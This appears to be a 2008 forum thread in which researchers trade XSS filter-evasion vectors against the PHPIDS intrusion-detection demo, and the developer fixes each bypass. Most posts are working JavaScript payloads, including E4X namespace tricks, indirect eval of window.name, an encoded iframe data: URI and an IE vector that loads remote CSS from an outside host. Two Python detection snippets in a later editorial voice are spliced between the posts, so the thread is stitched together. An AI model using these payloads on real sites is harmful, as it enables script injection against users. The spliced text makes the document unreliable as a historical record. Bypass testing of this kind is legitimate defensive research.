Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: September 01, 2008 11:54AM

Quote:
> @Reiners: What characters are allowed from MSSQL col names? \w and - or more?

only \w

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 02, 2008 05:01AM

Thx - what about multiple rectangular brackets - like SELECT[[foo]]FROM[[[bar]]] ?

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: September 02, 2008 10:13AM

Ah, I didn't think about that, but no, not possible. Also you can't use whitespace or other prefixes inside the brackets, because everything is considered a column name.

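Following up on the bracket-quoting question above, an added example (not PHPIDS's own code and not Reiners's test): a small Python converter that rewrites bracket-quoted T-SQL identifiers back into whitespace-delimited tokens before a keyword rule runs, so `SELECT[foo]FROM[bar]` is scored the same as `SELECT foo FROM bar`. The `\w`-only identifier assumption follows Reiners's test; the `SELECT ... FROM` rule is an assumed stand-in for a real filter.

```python
import re

# Added example (not PHPIDS code). Assumption, following Reiners's test in the
# thread: a bracket-quoted T-SQL identifier contains only \w characters.
BRACKET_IDENT = re.compile(r"\[(\w+)\]")

# Assumed stand-in for a keyword filter tuned to whitespace-delimited SQL:
# SELECT, at least one token, FROM, an identifier.
SELECT_FROM = re.compile(r"\bselect\s+\S.*?\s+from\s+\w+", re.I)

def convert_brackets(s):
    """Rewrite every [ident] as ' ident ' and collapse the resulting whitespace."""
    s = BRACKET_IDENT.sub(lambda m: " " + m.group(1) + " ", s)
    return re.sub(r"\s+", " ", s).strip()

def raw_hit(s):
    """Keyword rule applied to the raw input: misses the bracket-only spelling."""
    return SELECT_FROM.search(s) is not None

def converted_hit(s):
    """Keyword rule applied after bracket conversion: both spellings are caught."""
    return SELECT_FROM.search(convert_brackets(s)) is not None

# Constructed inputs: the whitespace-delimited query and its bracket-only spelling.
SPACED = "SELECT foo FROM bar"
BRACKET = "SELECT[foo]FROM[bar]"

if __name__ == "__main__":
    for q in (SPACED, BRACKET):
        print("%-22s raw=%-5s converted=%s" % (q, raw_hit(q), converted_hit(q)))
```
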
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 02, 2008 11:03AM

Phew :) Thanks for testing!

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: September 11, 2008 04:00PM

This is just beautiful :)
Check out the centrifuge evasion.

http://www.businessinfo.co.uk/labs/phpids/phpids3.html

default xml namespace=toolbar,b=1&&this.atob
default xml namespace=toolbar,e2=b('ZXZhbA')
default xml namespace=toolbar,e=this[toolbar,e2]
default xml namespace=toolbar,y=1&&name
default xml namespace=toolbar
default xml namespace=e(y)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: September 11, 2008 06:13PM

stealing Gareth's trick... http://p42.us/phpids/72.html

which injects this:
default xml namespace=toolbar,x='loca'
default xml namespace=toolbar,this[x+'tion']=name


yeah, I'll buy you that beer. You'll join RSnake in the exclusive group of people I've ever bought a beer for :)

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: September 12, 2008 12:30AM

Nice :D

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 12, 2008 03:54AM

Hi,

wow - this is a beauty indeed! Bloody E4X :)

I bet there's more - I have to get more involved with E4X as soon as I find some time.

Greetings and thx|congrats ;)
.mario

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: September 21, 2008 02:52PM

delete~typeof~typeof~typeof~typeof~typeof~typeof~alert(1)

Here's a way to execute any payload:-
delete~typeof~typeof~typeof~typeof~typeof~typeof~eval(1&&name)

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: September 22, 2008 02:13PM

nice one, gareth!

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 25, 2008 05:28PM

Nice - indeed. I forgot to answer here after we chatted ;)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Kyo
Date: October 10, 2008 12:22AM

What're you talking about, catholic people get to watch porn

as long as it's two married people having sex in the videos

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thrill
Date: October 10, 2008 12:44AM

heh.. reminds me of a time when my ex-wife and I went to a store to buy a new bed.. the lady came up and asked "are you married", I answered "yes, but not to each other!".. she quickly walked away.. so porn between two people that are married is not a bad thing.. unless they're married to each other! ;)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Kyo
Date: October 10, 2008 07:45AM

Interesting, I somehow managed to post this in the wrong thread in the wrong forum

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 10, 2008 02:29PM

lol and thrill also replied

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Reiners
Date: October 18, 2008 01:01PM

hm this little one slipped through by time:

'<~' http://demo.php-ids.org/?test=%27%3C%7E%27

Greetings!

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 19, 2008 07:47AM

A bug indeed - thanks for pointing out! fixed.

Greetings,
.mario

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 25, 2008 10:04AM

data:text/html,<iframe%20src="http://demo.phpids.org?test=%25C2%25AA%25C2%25AA%253D1%2526%2526name%250A%25C2%25AA%253D1%2526%2526window.eval%252C1%250A%25C2%25AA(%25C2%25AA%25C2%25AA)"%20name="alert(1)"></iframe>

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 25, 2008 09:26PM

Uaaah - 3am. Coming home - being drunk - finding this and asking oneself existential questions - fixing it - all good ;)

Again - an incredible circumvention. Wow. Man Gareth - too bad you can't come to Portugal!

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 25, 2008 10:32PM

don't drink and regex

injection is essentially the same as Gareth's, I just recoded to eliminate the &&'s:
y=1+name
x=0?[]:window.eval
x(y)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thrill
Date: October 25, 2008 10:47PM

For that matter, don't drink and internet!!!!!!!!!!

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 25, 2008 11:31PM

shortened a bit to:
x=this.eval
x(0?$:name+1)
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: kuza55
Date: October 26, 2008 12:19AM

22 pages and still going strong, that doesn't really bode well for IDS systems does it?

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 26, 2008 07:55AM

@thornmaker

Nice variations :)

@mario

Shame I couldn't go I'd like to :(

@kuza55

Any IDS system can be broken eventually; the trick is creating the least insecure one :)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 26, 2008 08:08AM

Nice ones - thx!!! Gareth's injection btw uncovered a nasty bug in one of the converter rules when dealing with RTL/LTR characters.

@thrill: Sometimes you gotta do what you gotta do.

@kuza55: About 461K bug entries for Firefox - that doesn't really bode well for browsers does it? (It really doesn't but I am sure you are getting my point)

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 26, 2008 04:53PM

You gotta love expressions :)

IE only vector:-
document.createStyleSheet('http://businessinfo.co.uk/labs/xss/xss.css')

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: thornmaker
Date: October 27, 2008 02:07PM

I'm surprised these aren't picked up by the centrifuge. Code for this one is:
y='nam'
x=this.eval
x(x(y+ ('e')+new Array)+y)

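The vectors collected in this thread (the `default xml namespace` carrier, `this.eval` / `window.eval`, the `delete~typeof~` chains and the ternary-selected call) all reach eval without ever writing `eval(` directly, which is why a filter keyed on that literal misses them. As an added example (my own rules, not PHPIDS's filter set or the centrifuge), a small Python classifier that normalises whitespace and quotes and then matches patterns for those carriers; the rule names, the exact patterns and the benign sample are assumptions, and the inputs are the vectors posted above.

```python
import re

# Added example, not PHPIDS code: a minimal rule set for the eval carriers
# posted in this thread. Rule names and patterns are my own assumptions.
RULES = {
    # E4X "default xml namespace" statement used to carry a comma expression
    "e4x_default_namespace": re.compile(r"default\s+xml\s+namespace", re.I),
    # eval reached as a property of the global object, by name or computed key
    "indirect_eval": re.compile(r"\b(?:this|window|self)\s*(?:\.\s*eval\b|\[[^\]]*\])", re.I),
    # window.name used as an operand (after =, &&, +, : or an opening parenthesis)
    "name_operand": re.compile(r"(?:=|&&|\+|:|\()\s*name\b", re.I),
    # delete~typeof~typeof~... chains wrapping a call in unary operators
    "typeof_chain": re.compile(r"(?:delete|typeof)\s*~\s*(?:typeof\s*~\s*)+", re.I),
    # conditional operator choosing between a decoy and a global eval reference
    "ternary_eval": re.compile(r"\?[^:]*:\s*(?:window|this)\s*\.\s*eval\b", re.I),
}

def normalise(payload):
    """Collapse all whitespace (newlines included) and unify quote characters."""
    return re.sub(r"\s+", " ", payload).replace("'", '"')

def classify(payload):
    """Return the names of the rules that fire on the normalised payload."""
    s = normalise(payload)
    return [name for name, rx in RULES.items() if rx.search(s)]

# Constructed inputs: the vectors posted in this thread, plus one benign string.
THREAD_VECTORS = [
    "default xml namespace=toolbar,b=1&&this.atob",
    "default xml namespace=toolbar,this[x+'tion']=name",
    "delete~typeof~typeof~typeof~typeof~typeof~typeof~eval(1&&name)",
    "y=1+name\nx=0?[]:window.eval\nx(y)",
    "x=this.eval\nx(0?$:name+1)",
    "y='nam'\nx=this.eval\nx(x(y+ ('e')+new Array)+y)",
]
BENIGN = "select your name from the list, then press ok"

if __name__ == "__main__":
    for v in THREAD_VECTORS + [BENIGN]:
        print(repr(v), "->", classify(v))
```
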
Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Gareth Heyes
Date: October 27, 2008 03:00PM

@thornmaker

Nice :D

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: Anonymous User
Date: October 27, 2008 06:48PM

Lame excuse - I know - but there is something wrong with our server.

I already contacted the admins. The vector generates an impact on my local demo and with the unit tests - but not on the remote box. I tried some live debugging but couldn't find anything besides a very weird acting regex. I applied some (hot)-fixes to the rules but haven't found the main issue yet.

Re: PHPIDS (0.5.3 - one release to detect them all)
Posted by: kuza55
Date: October 27, 2008 07:57PM

.mario Wrote:
-------------------------------------------------------
> @kuza55: About 461K bug entries for Firefox - that
> doesn't really bode well for browsers does it? (It
> really doesn't but I am sure you are getting my
> point)

No, it doesn't.

However, I've been subscribed to the firefox new bugs list in my rss reader for the last week, and a lot of the bugs are feature requests, or bugs which have zero security impact, or may have a crash if the user does a bunch of actions.

Contrast this with an IDS where almost any bug is a security issue.
